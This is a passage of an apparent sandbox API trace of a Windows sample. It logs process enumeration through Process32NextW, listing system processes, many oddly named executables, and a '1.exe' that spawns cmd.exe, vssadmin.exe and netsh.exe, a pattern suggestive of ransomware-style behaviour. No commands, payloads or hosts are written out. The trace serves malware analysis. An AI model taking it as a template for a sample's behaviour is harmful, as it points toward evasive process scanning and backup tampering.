th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0066.268] GetLastError () returned 0x12 [0066.268] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0066.268] GetLastError () returned 0x12 [0066.268] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.269] GetLastError () returned 0x12 [0066.269] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0066.270] GetLastError () returned 0x12 [0066.270] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0066.270] GetLastError () returned 0x12 [0066.270] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.271] GetLastError () returned 0x12 [0066.271] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0066.272] GetLastError () returned 0x12 [0066.272] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.272] GetLastError () returned 0x12 [0066.272] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.273] GetLastError () returned 0x12 [0066.273] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.274] GetLastError () returned 0x12 [0066.274] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.274] GetLastError () returned 0x12 [0066.275] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.275] GetLastError () returned 0x12 [0066.275] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.276] GetLastError () returned 0x12 [0066.276] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.277] GetLastError () returned 0x12 [0066.277] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.277] GetLastError () returned 0x12 [0066.277] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.278] GetLastError () returned 0x12 [0066.278] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0066.279] GetLastError () returned 0x12 [0066.279] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.279] GetLastError () returned 0x12 [0066.280] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.280] GetLastError () returned 0x12 [0066.280] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0066.281] GetLastError () returned 0x12 [0066.281] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0066.282] GetLastError () returned 0x12 [0066.282] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.282] GetLastError () returned 0x12 [0066.282] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0066.283] GetLastError () returned 0x12 [0066.283] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0066.284] GetLastError () returned 0x12 [0066.284] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0066.284] GetLastError () returned 0x12 [0066.284] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0066.285] GetLastError () returned 0x12 [0066.285] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0066.286] GetLastError () returned 0x12 [0066.286] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0066.286] GetLastError () returned 0x12 [0066.286] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0066.287] GetLastError () returned 0x12 [0066.287] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0066.288] GetLastError () returned 0x12 [0066.288] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0066.288] GetLastError () returned 0x12 [0066.289] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0066.289] GetLastError () returned 0x12 [0066.289] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0066.290] GetLastError () returned 0x12 [0066.290] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0066.291] GetLastError () returned 0x12 [0066.291] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0066.291] GetLastError () returned 0x12 [0066.291] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0066.292] GetLastError () returned 0x12 [0066.292] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0066.293] GetLastError () returned 0x12 [0066.293] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0066.293] GetLastError () returned 0x12 [0066.293] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0066.395] GetLastError () returned 0x12 [0066.407] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0066.422] GetLastError () returned 0x12 [0066.422] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0066.423] GetLastError () returned 0x12 [0066.423] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0066.474] GetLastError () returned 0x12 [0066.474] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0066.475] GetLastError () returned 0x12 [0066.475] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0066.476] GetLastError () returned 0x12 [0066.476] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0066.477] GetLastError () returned 0x12 [0066.477] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0066.477] GetLastError () returned 0x12 [0066.477] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0066.478] GetLastError () returned 0x12 [0066.478] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0066.479] GetLastError () returned 0x12 [0066.479] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0066.479] GetLastError () returned 0x12 [0066.479] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0066.480] GetLastError () returned 0x12 [0066.480] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0066.481] GetLastError () returned 0x12 [0066.481] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0066.482] GetLastError () returned 0x12 [0066.482] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0066.483] GetLastError () returned 0x12 [0066.483] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0066.484] GetLastError () returned 0x12 [0066.484] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0066.485] GetLastError () returned 0x12 [0066.485] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0066.486] GetLastError () returned 0x12 [0066.486] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0066.487] GetLastError () returned 0x12 [0066.487] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0066.488] GetLastError () returned 0x12 [0066.488] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0066.488] GetLastError () returned 0x12 [0066.489] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0066.489] GetLastError () returned 0x12 [0066.489] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0066.490] GetLastError () returned 0x12 [0066.490] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.491] GetLastError () returned 0x12 [0066.491] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.492] GetLastError () returned 0x12 [0066.492] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0066.493] GetLastError () returned 0x12 [0066.493] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0066.494] GetLastError () returned 0x12 [0066.494] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.495] GetLastError () returned 0x12 [0066.495] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0066.495] GetLastError () returned 0x12 [0066.495] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0066.496] GetLastError () returned 0x12 [0066.496] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.497] GetLastError () returned 0x12 [0066.497] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.498] GetLastError () returned 0x12 [0066.498] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0066.499] GetLastError () returned 0x12 [0066.499] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.500] GetLastError () returned 0x12 [0066.500] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0066.500] GetLastError () returned 0x12 [0066.500] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0066.501] GetLastError () returned 0x12 [0066.501] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.502] GetLastError () returned 0x12 [0066.502] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x234, pcPriClassBase=13, 